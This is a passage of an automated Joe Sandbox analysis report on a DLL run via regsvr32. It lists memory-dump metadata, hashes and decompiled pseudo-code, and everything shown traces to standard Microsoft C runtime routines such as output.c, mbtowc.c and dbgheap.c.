                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1328470723-1899493600
                                                                                • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                • Instruction ID: 67090b6cbc7cb9cb6b36ca12a24cf551c7c14139d9c093944754f8074d61b328
                                                                                • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                • Instruction Fuzzy Hash: 46C1FB76A1CA828AE7748B14E8407ABB7F0FB85355F488135D69D87A99DFBCE441CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                                                • String ID:
                                                                                • API String ID: 2352934578-0
                                                                                • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                • Instruction ID: bc7e83dcf72b578842d02bd648b1958f98004a2ca6149ecf888bc7e4f1bcd234
                                                                                • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                • Instruction Fuzzy Hash: 4CB1D43290C7818AE760CB55E84476AB7F0F78A794F158125EADE47B98DBBCE4848F40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                                                • API String ID: 2123368286-322314505
                                                                                • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                • Instruction ID: ad4ec671702c8caf887fa4b0fe2b4d556eba4412ad1b0c60a8c78c242be498eb
                                                                                • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                • Instruction Fuzzy Hash: 90022F31A1CB8585EBB49B24E84437A67F0FB86794F188535D6AD83BD9DFBCD0858B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1139040907-3988320827
                                                                                • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                • Instruction ID: bcafbdaf528383cec6508ff0f168c7b1becb4dfb1429a522a6bbc7bd7ef942a6
                                                                                • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                • Instruction Fuzzy Hash: CCF1FA7660CA818AE7648B15E8403ABB7F0FB86745F188135E69D87A99DFBCD441CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                                                • API String ID: 2123368286-3300880850
                                                                                • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                • Instruction ID: db939f6c851c2bb8b3384be7a5bf4051eead2c39c19688978390050b8158daeb
                                                                                • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                • Instruction Fuzzy Hash: 81C11E31A1CB8685EB708B15E85436A63F0FB86794F588135D6AE43B9DDFBCD445CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                                                • API String ID: 2123368286-3045918802
                                                                                • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                • Instruction ID: 2e7e78141a037d4db5c94abfb6da0846a8a185172880bf108d9233df77ee881d
                                                                                • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                • Instruction Fuzzy Hash: A0C13A31A1CB9AC5EB708B14E84436A63F0F786794F548136D6AE43BADDFBCE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 15%
                                                                                			E00007FFA7FFA5247F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                                                				intOrPtr _v24;
                                                                                				long long _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v56;
                                                                                				char _v88;
                                                                                				intOrPtr _v96;
                                                                                				long long _v104;
                                                                                				void* _t80;
                                                                                				void* _t81;
                                                                                				void* _t89;
                                                                                				void* _t92;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr* _t136;
                                                                                				intOrPtr* _t137;
                                                                                				intOrPtr* _t139;
                                                                                				signed char* _t141;
                                                                                				intOrPtr* _t142;
                                                                                				intOrPtr* _t143;
                                                                                				intOrPtr* _t144;
                                                                                				intOrPtr* _t148;
                                                                                				intOrPtr* _t149;
                                                                                
                                                                                				_a32 = __r9;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				if (_a16 == 0) goto 0x5247f031;
                                                                                				if (_a24 != 0) goto 0x5247f038;
                                                                                				goto 0x5247f31a;
                                                                                				_t136 = _a16;
                                                                                				if ( *_t136 != 0) goto 0x5247f066;
                                                                                				if (_a8 == 0) goto 0x5247f05f;
                                                                                				 *_a8 = 0;
                                                                                				goto 0x5247f31a;
                                                                                				0x524666b0();
                                                                                				_t80 = E00007FFA7FFA52466840(0,  &_v88);
                                                                                				_t137 =  *_t136;
                                                                                				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0x5247f0d2;
                                                                                				_t81 = E00007FFA7FFA52466840(_t80,  &_v88);
                                                                                				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0x5247f0d2;
                                                                                				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                                                				_v104 = _t139;
                                                                                				r9d = 0;
                                                                                				r8d = 0x47;
                                                                                				0x5246b3b0();
                                                                                				if (_t81 != 1) goto 0x5247f0d2;
                                                                                				asm("int3");
                                                                                				E00007FFA7FFA52466840(0,  &_v88);
                                                                                				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0x5247f121;
                                                                                				if (_a8 == 0) goto 0x5247f106;
                                                                                				_t141 = _a16;
                                                                                				 *_a8 =  *_t141 & 0x000000ff;
                                                                                				_v56 = 1;
                                                                                				E00007FFA7FFA52466800( &_v88);
                                                                                				goto 0x5247f31a;
                                                                                				E00007FFA7FFA52466840(_v56,  &_v88);
                                                                                				if (E00007FFA7FFA52472B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0x5247f276;
                                                                                				_t89 = E00007FFA7FFA52466840(_t88,  &_v88);
                                                                                				_t142 =  *_t141;
                                                                                				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0x5247f1f3;
                                                                                				E00007FFA7FFA52466840(_t89,  &_v88);
                                                                                				_t143 =  *_t142;
                                                                                				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0x5247f1f3;
                                                                                				if (_a8 == 0) goto 0x5247f191;
                                                                                				_v36 = 1;
                                                                                				goto 0x5247f199;
                                                                                				_v36 = 0;
                                                                                				_t92 = E00007FFA7FFA52466840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                                                				_t144 =  *_t143;
                                                                                				_v32 = _t144;
                                                                                				E00007FFA7FFA52466840(_t92,  &_v88);
                                                                                				_v96 = _v36;
                                                                                				_v104 = _a8;
                                                                                				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x5247f247;
                                                                                				E00007FFA7FFA52466840(_t94,  &_v88);
                                                                                				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0x5247f221;
                                                                                				_t148 = _a16;
                                                                                				if ( *((char*)(_t148 + 1)) != 0) goto 0x5247f247;
                                                                                				0x5246ab30();
                                                                                				 *_t148 = 0x2a;
                                                                                				_v52 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_v88);
                                                                                				goto 0x5247f31a;
                                                                                				E00007FFA7FFA52466840(_v52,  &_v88);
                                                                                				_t149 =  *_t148;
                                                                                				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                                                				E00007FFA7FFA52466800( &_v88);
                                                                                				_t102 = _v48;
                                                                                				goto 0x5247f310;
                                                                                				if (_a8 == 0) goto 0x5247f28b;
                                                                                				_v24 = 1;
                                                                                				goto 0x5247f293;
                                                                                				_v24 = 0;
                                                                                				E00007FFA7FFA52466840(_t102,  &_v88);
                                                                                				_v96 = _v24;
                                                                                				_v104 = _a8;
                                                                                				r9d = 1;
                                                                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x5247f2f8;
                                                                                				0x5246ab30();
                                                                                				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                                                				_v44 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_v88);
                                                                                				goto 0x5247f31a;
                                                                                				_v40 = 1;
                                                                                				E00007FFA7FFA52466800( &_v88);
                                                                                				goto 0x5247f31a;
                                                                                				return E00007FFA7FFA52466800( &_v88);
                                                                                			}





























                                                                                APIs
                                                                                Strings
                                                                                • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 00007FFA5247F0A4
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 00007FFA5247F0B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                                                • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                                                • API String ID: 3162172745-1617866167
                                                                                • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                • Instruction ID: 59a62844a3b0f289c1758b23412e1c533b70fde52b32bb33b007494ce318b55b
                                                                                • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                • Instruction Fuzzy Hash: 96910E32A1CA8186D760DB24E8503AAB7F0FB92B44F498135E69D47799DFBCE446CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                                                • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 792801276-1329727594
                                                                                • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                • Instruction ID: c541508dc94947dff84f5a5c420df42b9c003d6900f261d875c837245fb8f948
                                                                                • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                • Instruction Fuzzy Hash: 6C611672A0DAC186E7349B51E8507AABBB1FB86740F548136DA8D47B99DFBCE404CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                                                • API String ID: 747159061-3177431134
                                                                                • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                • Instruction ID: d889bf42578c32ef97e94a5f9a1136c3909a66bfa0fc3faaeed281cff836b841
                                                                                • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                • Instruction Fuzzy Hash: 19519F72A2864696E7108B54E88036973F1FB82760F59D331E67D476ECDBFCE4028B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                                                • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                                                • API String ID: 1608253119-1427866139
                                                                                • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                • Instruction ID: eda0b896a4d51b69c88f434b3fdd59c78a77a6b803c486d184df0f955412a082
                                                                                • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                • Instruction Fuzzy Hash: 9541473192CB4682E7609B10F84436A77F0FB86B80F588235E69D52A9CDFBDF484CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                                                • API String ID: 2123368286-2958264153
                                                                                • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                • Instruction ID: 21d664820b82a056aa85d550d742602ae13a0895b4aad450b701794ea8eac873
                                                                                • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                • Instruction Fuzzy Hash: 9FE11E3191DA868AE6708B24E84436A73F0FB86764F188235E6AD437DDDFBCE445DB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-569934968
                                                                                • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                • Instruction ID: 148027add7e09617901c03ed099f7b50454c9cc57fbbf64937ce10358ef23e76
                                                                                • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                • Instruction Fuzzy Hash: 5BD1F57250CAC68AE7718B14E8503AAB7F4F785744F184135EAAD86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5247BFDE(char _a696, char _a976) {
                                                                                
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}



                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: wctomb_s
                                                                                • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2215178078-1895985292
                                                                                • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                • Instruction ID: 5693993a436d2286327f220cbf59ea58584b5acd74a6541b8eb7bad1ee04bcd3
                                                                                • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                • Instruction Fuzzy Hash: 54B1077250C6C68AE771CB14E8853AAB7F4F785744F088136E6AD86A9DDBBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                                                • API String ID: 2123368286-348877268
                                                                                • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                • Instruction ID: 14975f8774797eee51e9184b844ad3f3757a854f4c2c6ae7591a686c9c3d2a12
                                                                                • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                • Instruction Fuzzy Hash: 11912C3191CA4286E760CB24E85476A77F0FB86354F188235E6AD47BECDFBCE4458B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-4087627024
                                                                                • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                • Instruction ID: d50ff1424286c9911e124f544748b6b2b13aa7fb857a8b04262d30381f357936
